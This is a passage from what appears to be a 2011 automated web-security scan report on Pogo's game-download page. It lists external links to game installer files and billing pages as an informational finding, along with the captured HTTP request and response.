                                   <a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/zumas_revenge-setup.exe?RefId=headernav_fp_shopmenu&origin=hp_catGame_lnk&genre=Puzzle&ln=en&ext=zumas_revenge-setup.exe" onclick="omnitureLogDownload('117734103','oberonpogostd','Zumas Revenge','puzzle','1/8/2011 5:32:22 PM')" target="_self" ><img src="/images/games/zumas_revenge/zumas_revenge81x46.gif" alt="" width="81" height="46" border="0">
...[SNIP]...
<td nowrap style="width:78px">

                                   <a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/zumas_revenge-setup.exe?RefId=headernav_fp_shopmenu&origin=hp_catGame_lnk&genre=Puzzle&ln=en&ext=zumas_revenge-setup.exe" target="_self" onclick="omnitureLogDownload('117734103','oberonpogostd','Zumas Revenge','puzzle','1/8/2011 5:32:22 PM')"><img src="/Graphics/Pogo/en/o_pogo/buttonDownload.gif" alt="" width="15" height="15" border="0" align="middle" style="margin-right: 4px; margin-top: -2px;"></a><a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/zumas_revenge-setup.exe?RefId=headernav_fp_shopmenu&origin=hp_catGame_lnk&genre=Puzzle&ln=en&ext=zumas_revenge-setup.exe" target="_self" onclick="omnitureLogDownload('117734103','oberonpogostd','Zumas Revenge','puzzle','1/8/2011 5:32:22 PM')">Try Free</a>
...[SNIP]...
<td nowrap style="padding-left:5px"><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=117734103&channel=110184400&RefID=headernav_fp_shopmenu&orign=hp_catGame_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate="><img src="/Graphics/Pogo/en/o_pogo/buttonBuy.gif" alt="" width="15" height="15" border="0" align="middle" style="margin-right: 4px; margin-top: -2px;"></a><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=117734103&channel=110184400&RefID=headernav_fp_shopmenu&orign=hp_catGame_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate=">Buy</a>
...[SNIP]...
<td valign="top" width="81" style="padding-left:5px">

                                   <a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/SCRABBLE_Tour-setup.exe?RefId=headernav_fp_shopmenu&origin=hp_catGame_lnk&genre=Pogo Originals&ln=en&ext=SCRABBLE_Tour-setup.exe" onclick="omnitureLogDownload('118594473','oberonpogostd','Scrabble Tour','Pogo Original','1/8/2011 5:32:22 PM')" target="_self" ><img src="/images/games/SCRABBLETour/SCRABBLETour81x46.gif" alt="" width="81" height="46" border="0">
...[SNIP]...
<td nowrap style="width:78px">

                                   <a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/SCRABBLE_Tour-setup.exe?RefId=headernav_fp_shopmenu&origin=hp_catGame_lnk&genre=Pogo Originals&ln=en&ext=SCRABBLE_Tour-setup.exe" target="_self" onclick="omnitureLogDownload('118594473','oberonpogostd','Scrabble Tour','Pogo Original','1/8/2011 5:32:22 PM')"><img src="/Graphics/Pogo/en/o_pogo/buttonDownload.gif" alt="" width="15" height="15" border="0" align="middle" style="margin-right: 4px; margin-top: -2px;"></a><a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/SCRABBLE_Tour-setup.exe?RefId=headernav_fp_shopmenu&origin=hp_catGame_lnk&genre=Pogo Originals&ln=en&ext=SCRABBLE_Tour-setup.exe" target="_self" onclick="omnitureLogDownload('118594473','oberonpogostd','Scrabble Tour','Pogo Original','1/8/2011 5:32:22 PM')">Try Free</a>
...[SNIP]...
<td nowrap style="padding-left:5px"><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=118594473&channel=110184400&RefID=headernav_fp_shopmenu&orign=hp_catGame_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate="><img src="/Graphics/Pogo/en/o_pogo/buttonBuy.gif" alt="" width="15" height="15" border="0" align="middle" style="margin-right: 4px; margin-top: -2px;"></a><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=118594473&channel=110184400&RefID=headernav_fp_shopmenu&orign=hp_catGame_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate=">Buy</a>
...[SNIP]...
<td valign="top" width="81" style="padding-left:5px">

                                   <a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/Mahjongg_dimensions_51548812-setup.exe?RefId=headernav_fp_shopmenu&origin=hp_catGame_lnk&genre=Puzzle&ln=en&ext=Mahjongg_dimensions_51548812-setup.exe" onclick="omnitureLogDownload('118444187','oberonpogostd','Mahjongg Dimensions','puzzle','1/8/2011 5:32:22 PM')" target="_self" ><img src="/images/games/MahjonggDimensionsDeluxe/MahjonggDimensionsDeluxe81x46.gif" alt="" width="81" height="46" border="0">
...[SNIP]...
<td nowrap style="width:78px">

                                   <a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/Mahjongg_dimensions_51548812-setup.exe?RefId=headernav_fp_shopmenu&origin=hp_catGame_lnk&genre=Puzzle&ln=en&ext=Mahjongg_dimensions_51548812-setup.exe" target="_self" onclick="omnitureLogDownload('118444187','oberonpogostd','Mahjongg Dimensions','puzzle','1/8/2011 5:32:22 PM')"><img src="/Graphics/Pogo/en/o_pogo/buttonDownload.gif" alt="" width="15" height="15" border="0" align="middle" style="margin-right: 4px; margin-top: -2px;"></a><a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/Mahjongg_dimensions_51548812-setup.exe?RefId=headernav_fp_shopmenu&origin=hp_catGame_lnk&genre=Puzzle&ln=en&ext=Mahjongg_dimensions_51548812-setup.exe" target="_self" onclick="omnitureLogDownload('118444187','oberonpogostd','Mahjongg Dimensions','puzzle','1/8/2011 5:32:22 PM')">Try Free</a>
...[SNIP]...
<td nowrap style="padding-left:5px"><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=118444187&channel=110184400&RefID=headernav_fp_shopmenu&orign=hp_catGame_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate="><img src="/Graphics/Pogo/en/o_pogo/buttonBuy.gif" alt="" width="15" height="15" border="0" align="middle" style="margin-right: 4px; margin-top: -2px;"></a><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=118444187&channel=110184400&RefID=headernav_fp_shopmenu&orign=hp_catGame_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate=">Buy</a>
...[SNIP]...
<td valign="top" width="81" style="padding-left:5px">

                                   <a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/skip_bo_castaway_caper_network-setup.exe?RefId=headernav_fp_shopmenu&origin=hp_catGame_lnk&genre=Cards&ln=en&ext=skip_bo_castaway_caper_network-setup.exe" onclick="omnitureLogDownload('1180130','oberonpogostd','SKIP-BO Castaway Caper (networ','cards','1/8/2011 5:32:22 PM')" target="_self" ><img src="/images/games/skip_bo_castaway_caper/skip_bo_castaway_caper81x46.gif" alt="" width="81" height="46" border="0">
...[SNIP]...
<td nowrap style="width:78px">

                                   <a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/skip_bo_castaway_caper_network-setup.exe?RefId=headernav_fp_shopmenu&origin=hp_catGame_lnk&genre=Cards&ln=en&ext=skip_bo_castaway_caper_network-setup.exe" target="_self" onclick="omnitureLogDownload('1180130','oberonpogostd','SKIP-BO Castaway Caper (networ','cards','1/8/2011 5:32:22 PM')"><img src="/Graphics/Pogo/en/o_pogo/buttonDownload.gif" alt="" width="15" height="15" border="0" align="middle" style="margin-right: 4px; margin-top: -2px;"></a><a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/skip_bo_castaway_caper_network-setup.exe?RefId=headernav_fp_shopmenu&origin=hp_catGame_lnk&genre=Cards&ln=en&ext=skip_bo_castaway_caper_network-setup.exe" target="_self" onclick="omnitureLogDownload('1180130','oberonpogostd','SKIP-BO Castaway Caper (networ','cards','1/8/2011 5:32:22 PM')">Try Free</a>
...[SNIP]...
<td nowrap style="padding-left:5px"><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=1180130&channel=110184400&RefID=headernav_fp_shopmenu&orign=hp_catGame_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate="><img src="/Graphics/Pogo/en/o_pogo/buttonBuy.gif" alt="" width="15" height="15" border="0" align="middle" style="margin-right: 4px; margin-top: -2px;"></a><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=1180130&channel=110184400&RefID=headernav_fp_shopmenu&orign=hp_catGame_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate=">Buy</a>
...[SNIP]...

16.16. http://download-games.pogo.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://download-games.pogo.com
Path:	/

Issue detail

The page was loaded from a URL containing a query string:

http://download-games.pogo.com/?site=pogo&refid=headernav_fp_pogotab&ifw=756&pageSection=header_downloads&ifh=210&lkey=x

The response contains the following links to other domains:

http://gamecenter.cdn3.oberon-media.com/pogo/exe/Hidden_Expedition_Titanic-setup.exe?RefId=headernav_fp_pogotab&origin=hp_catGame_lnk&genre=Hidden Object&ln=en&ext=Hidden_Expedition_Titanic-setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/Jewel_Quest_3-setup.exe?RefId=headernav_fp_pogotab&origin=pindex_mp_name&genre=Puzzle&ln=en&ext=Jewel_Quest_3-setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/Mahjongg_dimensions_51548812-setup.exe?RefId=headernav_fp_pogotab&origin=hp_catGame_lnk&genre=Puzzle&ln=en&ext=Mahjongg_dimensions_51548812-setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/SCRABBLE_Tour-setup.exe?RefId=headernav_fp_pogotab&origin=hp_catGame_lnk&genre=Pogo Originals&ln=en&ext=SCRABBLE_Tour-setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/The_Poppit_Show-setup.exe?RefId=headernav_fp_pogotab&origin=hp_catGame_lnk&genre=Pogo Originals&ln=en&ext=The_Poppit_Show-setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/bejeweled2-setup.exe?RefId=headernav_fp_pogotab&origin=hp_catGame_lnk&genre=Puzzle&ln=en&ext=bejeweled2-setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/bejeweled_3_89819902-setup.exe?RefId=headernav_fp_pogotab&origin=hp_catGame_lnk&genre=Puzzle&ln=en&ext=bejeweled_3_89819902-setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/bejeweled_3_89819902-setup.exe?RefId=headernav_fp_pogotab&origin=pindex_mp_name&genre=Puzzle&ln=en&ext=bejeweled_3_89819902-setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/build_a_lot_4-setup.exe?RefId=headernav_fp_pogotab&origin=hp_catGame_lnk&genre=Puzzle&ln=en&ext=build_a_lot_4-setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/buried_in_time_82138844-setup.exe?RefId=headernav_fp_pogotab&origin=hp_catGame_lnk&genre=Strategy&ln=en&ext=buried_in_time_82138844-setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/cake_mania_lights_camera_action_03564200-setup.exe?RefId=headernav_fp_pogotab&origin=hp_catGame_lnk&genre=Time Management&ln=en&ext=cake_mania_lights_camera_action_03564200-setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/cake_mania_to_the_max_83215850-setup.exe?RefId=headernav_fp_pogotab&origin=hp_catGame_lnk&genre=New&ln=en&ext=cake_mania_to_the_max_83215850-setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/chainz_galaxy_68453211-setup.exe?RefId=headernav_fp_pogotab&origin=hp_catGame_lnk&genre=New&ln=en&ext=chainz_galaxy_68453211-setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/cooking_dash_3_CE_84651245-setup.exe?RefId=headernav_fp_pogotab&origin=hp_catGame_lnk&genre=Time Management&ln=en&ext=cooking_dash_3_CE_84651245-setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/haunted_hidden_object_bundle_23135400-setup.exe?RefId=headernav_fp_pogotab&origin=hp_catGame_lnk&genre=Bundles&ln=en&ext=haunted_hidden_object_bundle_23135400-setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/jewel_quest_mysteries_2-setup.exe?RefId=headernav_fp_pogotab&origin=hp_catGame_lnk&genre=Hidden Object&ln=en&ext=jewel_quest_mysteries_2-setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/jewel_quest_mysteries_bundle_68450411-setup.exe?RefId=headernav_fp_pogotab&origin=hp_catGame_lnk&genre=New&ln=en&ext=jewel_quest_mysteries_bundle_68450411-setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/monopolycity_29678465-setup.exe?RefId=headernav_fp_pogotab&origin=hp_catGame_lnk&genre=Pogo Originals&ln=en&ext=monopolycity_29678465-setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/mystery_of_the_dragon_prince_84542444-setup.exe?RefId=headernav_fp_pogotab&origin=hp_catGame_lnk&genre=New&ln=en&ext=mystery_of_the_dragon_prince_84542444-setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/mystery_pi_san_francisco_29328371-setup.exe?RefId=headernav_fp_pogotab&origin=hp_catGame_lnk&genre=Hidden Object&ln=en&ext=mystery_pi_san_francisco_29328371-setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/peggle_nights-setup.exe?RefId=headernav_fp_pogotab&origin=hp_catGame_lnk&genre=Strategy&ln=en&ext=peggle_nights-setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/power_puzzle_pack_35128649-setup.exe?RefId=headernav_fp_pogotab&origin=hp_catGame_lnk&genre=Bundles&ln=en&ext=power_puzzle_pack_35128649-setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/skip_bo_castaway_caper_network-setup.exe?RefId=headernav_fp_pogotab&origin=hp_catGame_lnk&genre=Cards&ln=en&ext=skip_bo_castaway_caper_network-setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/virtual_villagers_4_50642057-setup.exe?RefId=headernav_fp_pogotab&origin=hp_catGame_lnk&genre=Strategy&ln=en&ext=virtual_villagers_4_50642057-setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/wedding_dash_forever_91283329-setup.exe?RefId=headernav_fp_pogotab&origin=hp_catGame_lnk&genre=Time Management&ln=en&ext=wedding_dash_forever_91283329-setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/zombie_bowl-setup.exe?RefId=headernav_fp_pogotab&origin=hp_catGame_lnk&genre=Arcade&ln=en&ext=zombie_bowl-setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/zumas_revenge-setup.exe?RefId=headernav_fp_pogotab&origin=hp_catGame_lnk&genre=Puzzle&ln=en&ext=zumas_revenge-setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/zumas_revenge-setup.exe?RefId=headernav_fp_pogotab&origin=pindex_mp_name&genre=Puzzle&ln=en&ext=zumas_revenge-setup.exe
https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=110272767&channel=110184400&RefID=headernav_fp_pogotab&orign=hp_catGame_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate=
https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=111565320&channel=110184400&RefID=headernav_fp_pogotab&orign=hp_catGame_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate=
https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=111730453&channel=110184400&RefID=headernav_fp_pogotab&orign=hp_catGame_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate=
https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=115563203&channel=110184400&RefID=headernav_fp_pogotab&orign=hp_catGame_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate=
https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=11743417&channel=110184400&RefID=headernav_fp_pogotab&orign=hp_catGame_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate=
https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=117734103&channel=110184400&RefID=headernav_fp_pogotab&orign=hp_catGame_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate=
https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=117842230&channel=110184400&RefID=headernav_fp_pogotab&orign=hp_catGame_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate=
https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=1180130&channel=110184400&RefID=headernav_fp_pogotab&orign=hp_catGame_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate=
https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=118017277&channel=110184400&RefID=headernav_fp_pogotab&orign=hp_catGame_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate=
https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=118249683&channel=110184400&RefID=headernav_fp_pogotab&orign=hp_catGame_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate=
https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=118444187&channel=110184400&RefID=headernav_fp_pogotab&orign=hp_catGame_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate=
https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=118580497&channel=110184400&RefID=headernav_fp_pogotab&orign=hp_catGame_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate=
https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=118594473&channel=110184400&RefID=headernav_fp_pogotab&orign=hp_catGame_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate=
https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=118870270&channel=110184400&RefID=headernav_fp_pogotab&orign=hp_catGame_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate=
https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=118958403&channel=110184400&RefID=headernav_fp_pogotab&orign=hp_catGame_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate=
https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=119118853&channel=110184400&RefID=headernav_fp_pogotab&orign=hp_catGame_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate=
https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=119309483&channel=110184400&RefID=headernav_fp_pogotab&orign=hp_catGame_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate=
https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=11934720&channel=110184400&RefID=headernav_fp_pogotab&orign=hp_catGame_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate=
https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=119354920&channel=110184400&RefID=headernav_fp_pogotab&orign=hp_catGame_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate=
https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=119477860&channel=110184400&RefID=headernav_fp_pogotab&orign=hp_catGame_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate=
https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=119621750&channel=110184400&RefID=headernav_fp_pogotab&orign=hp_catGame_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate=
https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=11964850&channel=110184400&RefID=headernav_fp_pogotab&orign=hp_catGame_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate=
https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=119718230&channel=110184400&RefID=headernav_fp_pogotab&orign=hp_catGame_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate=
https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=119730120&channel=110184400&RefID=headernav_fp_pogotab&orign=hp_catGame_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate=
https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=119761357&channel=110184400&RefID=headernav_fp_pogotab&orign=hp_catGame_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate=

Request

GET /?site=pogo&refid=headernav_fp_pogotab&ifw=756&pageSection=header_downloads&ifh=210&lkey=x HTTP/1.1
Host: download-games.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536510550-New%7C1297128510550%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; 117734103=Sat%20Jan%2008%202011%2019%3A28%3A34%20GMT%2D0600%20(Central%20Standard%20Time); OberonPogoComb=http%3A//download-games.pogo.com/%3Fsite%3Dpogo%26refid%3Dheadernav_fp_shopmenu%26ifw%3D756%26pageSection%3Dheader_downloads_store%26ifh%3D210%26lkey%3Dx; 11964850=Sat%20Jan%2008%202011%2019%3A28%3A45%20GMT%2D0600%20(Central%20Standard%20Time);

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Content-Type: text/html; charset=utf-8
Content-Length: 132023
Cache-Control: private, max-age=11713
Date: Sun, 09 Jan 2011 02:07:51 GMT
Connection: close

<HTML>
   <HEAD>
<meta name="msvalidate.01" content="F6F676EB374D905262C4FF19D14E715D" />
<meta name="description" content="Download games at Pogo including puzzle games, hidden object games, Pogo
...[SNIP]...
<td style="padding-left: 5px;">

                       <a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/zumas_revenge-setup.exe?RefId=headernav_fp_pogotab&origin=pindex_mp_name&genre=Puzzle&ln=en&ext=zumas_revenge-setup.exe" onclick="omnitureLogDownload('117734103','oberonpogostd','Zumas Revenge','puzzle','1/8/2011 8:23:31 PM')" target="_top"><img src="/Graphics/Pogo/en/o_pogo/buttonDownload.gif" alt="" width="15" height="15" border="0" align="middle"></a>
                       <a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/zumas_revenge-setup.exe?RefId=headernav_fp_pogotab&origin=pindex_mp_name&genre=Puzzle&ln=en&ext=zumas_revenge-setup.exe" onclick="omnitureLogDownload('117734103','oberonpogostd','Zumas Revenge','puzzle','1/8/2011 8:23:31 PM')" target="_top" class="txt11b">Try Free</a>
...[SNIP]...
<td style="padding-left: 5px;">

                       <a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/Jewel_Quest_3-setup.exe?RefId=headernav_fp_pogotab&origin=pindex_mp_name&genre=Puzzle&ln=en&ext=Jewel_Quest_3-setup.exe" onclick="omnitureLogDownload('115265627','oberonpogostd','Jewel Quest 3','puzzle','1/8/2011 8:23:31 PM')" target="_top"><img src="/Graphics/Pogo/en/o_pogo/buttonDownload.gif" alt="" width="15" height="15" border="0" align="middle"></a>
                       <a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/Jewel_Quest_3-setup.exe?RefId=headernav_fp_pogotab&origin=pindex_mp_name&genre=Puzzle&ln=en&ext=Jewel_Quest_3-setup.exe" onclick="omnitureLogDownload('115265627','oberonpogostd','Jewel Quest 3','puzzle','1/8/2011 8:23:31 PM')" target="_top" class="txt11b">Try Free</a>
...[SNIP]...
<td style="padding-left: 5px;">

                       <a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/bejeweled_3_89819902-setup.exe?RefId=headernav_fp_pogotab&origin=pindex_mp_name&genre=Puzzle&ln=en&ext=bejeweled_3_89819902-setup.exe" onclick="omnitureLogDownload('11964850','oberonpogostd','Bejeweled 3','puzzle','1/8/2011 8:23:31 PM')" target="_top"><img src="/Graphics/Pogo/en/o_pogo/buttonDownload.gif" alt="" width="15" height="15" border="0" align="middle"></a>
                       <a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/bejeweled_3_89819902-setup.exe?RefId=headernav_fp_pogotab&origin=pindex_mp_name&genre=Puzzle&ln=en&ext=bejeweled_3_89819902-setup.exe" onclick="omnitureLogDownload('11964850','oberonpogostd','Bejeweled 3','puzzle','1/8/2011 8:23:31 PM')" target="_top" class="txt11b">Try Free</a>
...[SNIP]...
<td valign="top" width="81" style="padding-left:5px">

                                   <a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/The_Poppit_Show-setup.exe?RefId=headernav_fp_pogotab&origin=hp_catGame_lnk&genre=Pogo Originals&ln=en&ext=The_Poppit_Show-setup.exe" onclick="omnitureLogDownload('111730453','oberonpogostd','The Poppit Show To Go','Pogo Original','1/8/2011 8:23:32 PM')" target="_self" ><img src="/images/games/poppit/poppit81x46.gif" alt="" width="81" height="46" border="0">
...[SNIP]...
<td nowrap style="width:78px">

                                   <a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/The_Poppit_Show-setup.exe?RefId=headernav_fp_pogotab&origin=hp_catGame_lnk&genre=Pogo Originals&ln=en&ext=The_Poppit_Show-setup.exe" target="_self" onclick="omnitureLogDownload('111730453','oberonpogostd','The Poppit Show To Go','Pogo Original','1/8/2011 8:23:32 PM')"><img src="/Graphics/Pogo/en/o_pogo/buttonDownload.gif" alt="" width="15" height="15" border="0" align="middle" style="margin-right: 4px; margin-top: -2px;"></a><a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/The_Poppit_Show-setup.exe?RefId=headernav_fp_pogotab&origin=hp_catGame_lnk&genre=Pogo Originals&ln=en&ext=The_Poppit_Show-setup.exe" target="_self" onclick="omnitureLogDownload('111730453','oberonpogostd','The Poppit Show To Go','Pogo Original','1/8/2011 8:23:32 PM')">Try Free</a>
...[SNIP]...
<td nowrap style="padding-left:5px"><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=111730453&channel=110184400&RefID=headernav_fp_pogotab&orign=hp_catGame_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate="><img src="/Graphics/Pogo/en/o_pogo/buttonBuy.gif" alt="" width="15" height="15" border="0" align="middle" style="margin-right: 4px; margin-top: -2px;"></a><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=111730453&channel=110184400&RefID=headernav_fp_pogotab&orign=hp_catGame_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate=">Buy</a>
...[SNIP]...
<td valign="top" width="81" style="padding-left:5px">

                                   <a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/SCRABBLE_Tour-setup.exe?RefId=headernav_fp_pogotab&origin=hp_catGame_lnk&genre=Pogo Originals&ln=en&ext=SCRABBLE_Tour-setup.exe" onclick="omnitureLogDownload('118594473','oberonpogostd','Scrabble Tour','Pogo Original','1/8/2011 8:23:32 PM')" target="_self" ><img src="/images/games/SCRABBLETour/SCRABBLETour81x46.gif" alt="" width="81" height="46" border="0">
...[SNIP]...
<td nowrap style="width:78px">

                                   <a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/SCRABBLE_Tour-setup.exe?RefId=headernav_fp_pogotab&origin=hp_catGame_lnk&genre=Pogo Originals&ln=en&ext=SCRABBLE_Tour-setup.exe" target="_self" onclick="omnitureLogDownload('118594473','oberonpogostd','Scrabble Tour','Pogo Original','1/8/2011 8:23:32 PM')"><img src="/Graphics/Pogo/en/o_pogo/buttonDownload.gif" alt="" width="15" height="15" border="0" align="middle" style="margin-right: 4px; margin-top: -2px;"></a><a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/SCRABBLE_Tour-setup.exe?RefId=headernav_fp_pogotab&origin=hp_catGame_lnk&genre=Pogo Originals&ln=en&ext=SCRABBLE_Tour-setup.exe" target="_self" onclick="omnitureLogDownload('118594473','oberonpogostd','Scrabble Tour','Pogo Original','1/8/2011 8:23:32 PM')">Try Free</a>
...[SNIP]...
<td nowrap style="padding-left:5px"><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=118594473&channel=110184400&RefID=headernav_fp_pogotab&orign=hp_catGame_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate="><img src="/Graphics/Pogo/en/o_pogo/buttonBuy.gif" alt="" width="15" height="15" border="0" align="middle" style="margin-right: 4px; margin-top: -2px;"></a><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=118594473&channel=110184400&RefID=headernav_fp_pogotab&orign=hp_catGame_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate=">Buy</a>
...[SNIP]...
<td valign="top" width="81" style="padding-left:5px">

                                   <a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/monopolycity_29678465-setup.exe?RefId=headernav_fp_pogotab&origin=hp_catGame_lnk&genre=Pogo Originals&ln=en&ext=monopolycity_29678465-setup.exe" onclick="omnitureLogDownload('118958403','oberonpogostd','Monopoly City','Pogo Original','1/8/2011 8:23:32 PM')" target="_self" ><img src="/images/games/MONOPOLYCity/MONOPOLYCity81x46.gif" alt="" width="81" height="46" border="0">
...[SNIP]...
<td nowrap style="width:78px">

